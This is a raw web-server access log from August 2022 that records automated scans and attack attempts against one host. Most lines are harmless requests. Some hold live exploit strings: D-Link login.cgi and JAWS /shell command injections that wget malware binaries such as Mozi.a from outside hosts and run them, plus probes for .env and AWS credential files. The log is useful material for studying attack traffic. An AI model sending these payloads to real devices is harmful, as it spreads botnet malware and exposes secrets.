23.239.16.64 - - [03/Aug/2022:05:24:17 +0200] "GET /db/sqlconnection.js HTTP/1.1" 404 324 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:17 +0200] "GET /api/shared/config/config.env HTTP/1.1" 404 333 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:17 +0200] "GET /api/shared/config.env HTTP/1.1" 404 326 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:18 +0200] "GET /config.env HTTP/1.1" 404 315 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:18 +0200] "GET /website/.env HTTP/1.1" 404 317 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:18 +0200] "GET /development/.env HTTP/1.1" 404 321 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:18 +0200] "GET /staging/.env HTTP/1.1" 404 317 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:19 +0200] "GET /prod/.env HTTP/1.1" 404 314 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:19 +0200] "GET /production/.env HTTP/1.1" 404 320 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:19 +0200] "GET /dev/.env HTTP/1.1" 404 313 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:19 +0200] "GET /laravel/.env HTTP/1.1" 404 317 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:20 +0200] "GET /backend/.env HTTP/1.1" 404 317 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:20 +0200] "GET /config.js HTTP/1.1" 404 314 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:20 +0200] "GET /api/shared/config/.env HTTP/1.1" 404 327 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:20 +0200] "GET /api/shared/.env HTTP/1.1" 404 320 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:21 +0200] "GET /api/.env HTTP/1.1" 404 313 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:21 +0200] "GET /config/constant.js HTTP/1.1" 404 323 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:21 +0200] "GET /config/constants.js HTTP/1.1" 404 324 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:21 +0200] "GET /constant.js HTTP/1.1" 404 316 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:22 +0200] "GET /constants.js HTTP/1.1" 404 317 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:22 +0200] "GET /config/main.json HTTP/1.1" 404 321 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:22 +0200] "GET /awsSettings.js HTTP/1.1" 404 319 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:22 +0200] "GET /api/aws/index.js HTTP/1.1" 404 321 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:23 +0200] "GET /config/probuildKeys.js HTTP/1.1" 404 327 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:23 +0200] "GET /?phpinfo=1 HTTP/1.1" 200 1229 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:23 +0200] "GET /?q=info HTTP/1.1" 200 1229 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:23 +0200] "GET /phpinfo.php?q=info HTTP/1.1" 404 316 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:24 +0200] "GET /app.js HTTP/1.1" 404 311 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:24 +0200] "GET /node/aws-config.json HTTP/1.1" 404 325 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:24 +0200] "GET /server/src/email.js HTTP/1.1" 404 324 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:24 +0200] "GET /config/config.js HTTP/1.1" 404 321 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:25 +0200] "GET /server/config.js HTTP/1.1" 404 321 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:25 +0200] "GET /WebServer/config/config.js HTTP/1.1" 404 331 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:25 +0200] "GET /webserver/config/config.js HTTP/1.1" 404 331 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:25 +0200] "GET /webserver-master/config/config.js HTTP/1.1" 404 338 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:26 +0200] "GET /.gitlab-ci.yml HTTP/1.1" 404 319 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:26 +0200] "GET /backend/config/plugins.js HTTP/1.1" 404 330 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:26 +0200] "GET /config/plugins.js HTTP/1.1" 404 322 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:27 +0200] "GET /lib/index.js HTTP/1.1" 404 317 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:27 +0200] "GET /server/index.js HTTP/1.1" 404 320 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:27 +0200] "GET /server/config/plugins.js HTTP/1.1" 404 329 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:27 +0200] "GET /docker-compose.base.yml HTTP/1.1" 404 328 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:28 +0200] "GET /app/api/email/controllers/email.js HTTP/1.1" 404 339 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:28 +0200] "GET /awsconfig.js HTTP/1.1" 404 317 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:28 +0200] "GET /template/scripts/additional/config/plugins.js HTTP/1.1" 404 350 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:28 +0200] "GET /src/misc/ses.ts HTTP/1.1" 404 320 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:29 +0200] "GET /Backend/config/plugin.js HTTP/1.1" 404 329 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:29 +0200] "GET /emails/ses.js HTTP/1.1" 404 318 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:29 +0200] "GET /src/server/utils/sendmail.js HTTP/1.1" 404 333 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:29 +0200] "GET /docker-compose.yml HTTP/1.1" 404 323 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:30 +0200] "GET /api/config.env HTTP/1.1" 404 319 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:30 +0200] "GET /config/aws.yml HTTP/1.1" 404 319 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:30 +0200] "GET /bundle/settings.json HTTP/1.1" 404 325 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:30 +0200] "GET /configs/settings.json HTTP/1.1" 404 326 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:31 +0200] "GET /config/settings.json HTTP/1.1" 404 325 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:31 +0200] "GET /settings.json HTTP/1.1" 404 318 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:31 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:31 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:05:24:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.196.220.70 - - [03/Aug/2022:05:34:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
138.229.236.137 - - [03/Aug/2022:05:35:13 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
167.172.244.81 - - [03/Aug/2022:05:38:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
167.172.244.81 - - [03/Aug/2022:05:38:32 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "http://212.91.246.84/" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
185.180.143.6 - - [03/Aug/2022:05:44:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
31.7.58.162 - - [03/Aug/2022:05:45:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
20.199.50.247 - - [03/Aug/2022:05:45:50 +0200] "GET /cgi-bin/luci HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.7.3) Gecko/20041001 Firefox/0.10.1"
31.7.58.162 - - [03/Aug/2022:05:46:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
193.106.29.122 - - [03/Aug/2022:05:46:54 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
181.214.218.69 - - [03/Aug/2022:05:48:51 +0200] "POST /29369674 HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Microsoft Windows NT 6.2.9200.0); rv:22.0) Gecko/20130405 Firefox/22.0"
106.251.118.122 - - [03/Aug/2022:05:52:57 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
61.0.206.14 - - [03/Aug/2022:05:54:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
185.180.143.136 - - [03/Aug/2022:05:58:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
103.164.191.36 - - [03/Aug/2022:06:00:48 +0200] "POST /mgmt/tm/util/bash HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
103.164.191.36 - - [03/Aug/2022:06:00:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.58.0"
128.14.141.34 - - [03/Aug/2022:06:02:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
165.227.190.29 - - [03/Aug/2022:06:03:38 +0200] "HEAD /spicons/apache_pb.gif HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
45.83.245.154 - - [03/Aug/2022:06:03:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
178.216.24.44 - - [03/Aug/2022:06:04:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
193.106.29.122 - - [03/Aug/2022:06:05:10 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
185.180.143.6 - - [03/Aug/2022:06:06:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
2.57.122.98 - - [03/Aug/2022:06:07:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
128.14.134.134 - - [03/Aug/2022:06:08:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
2.57.122.98 - - [03/Aug/2022:06:08:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
64.225.3.2 - - [03/Aug/2022:06:11:04 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
128.1.248.26 - - [03/Aug/2022:06:13:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.83.245.154 - - [03/Aug/2022:06:17:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
2.57.122.98 - - [03/Aug/2022:06:22:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
34.141.245.25 - - [03/Aug/2022:06:23:14 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ rischyo.cf/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
179.43.155.171 - - [03/Aug/2022:06:23:22 +0200] "\x16\x03\x01" 501 318 "-" "-"
179.43.155.171 - - [03/Aug/2022:06:23:22 +0200] "GET /?pp=env HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 2.3.3; en-us ; LS670 Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1/UCBrowser/8.6.1.262/145/355"
2.57.122.98 - - [03/Aug/2022:06:26:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
109.237.103.123 - - [03/Aug/2022:06:26:52 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.103.123 - - [03/Aug/2022:06:26:52 +0200] "\x16\x03\x01\x01D\x01" 501 321 "-" "-"
2.57.122.98 - - [03/Aug/2022:06:29:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
2.57.122.98 - - [03/Aug/2022:06:32:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
120.85.115.68 - - [03/Aug/2022:06:34:06 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 310 "-" "Hello, world"
183.136.225.35 - - [03/Aug/2022:06:37:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
2.57.122.98 - - [03/Aug/2022:06:37:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
20.199.50.247 - - [03/Aug/2022:06:37:36 +0200] "GET /cgi-bin/luci HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.7.3) Gecko/20041001 Firefox/0.10.1"
45.83.245.154 - - [03/Aug/2022:06:40:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
188.165.87.99 - - [03/Aug/2022:06:42:42 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0"
93.91.121.32 - - [03/Aug/2022:06:44:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
138.229.236.137 - - [03/Aug/2022:06:44:59 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
36.85.4.151 - - [03/Aug/2022:06:47:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
2.57.122.98 - - [03/Aug/2022:06:53:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.106.29.122 - - [03/Aug/2022:06:53:44 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
172.92.78.63 - - [03/Aug/2022:06:54:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
120.48.143.84 - - [03/Aug/2022:06:59:46 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ rischyo.cf/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
212.91.246.72 - - [03/Aug/2022:07:00:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
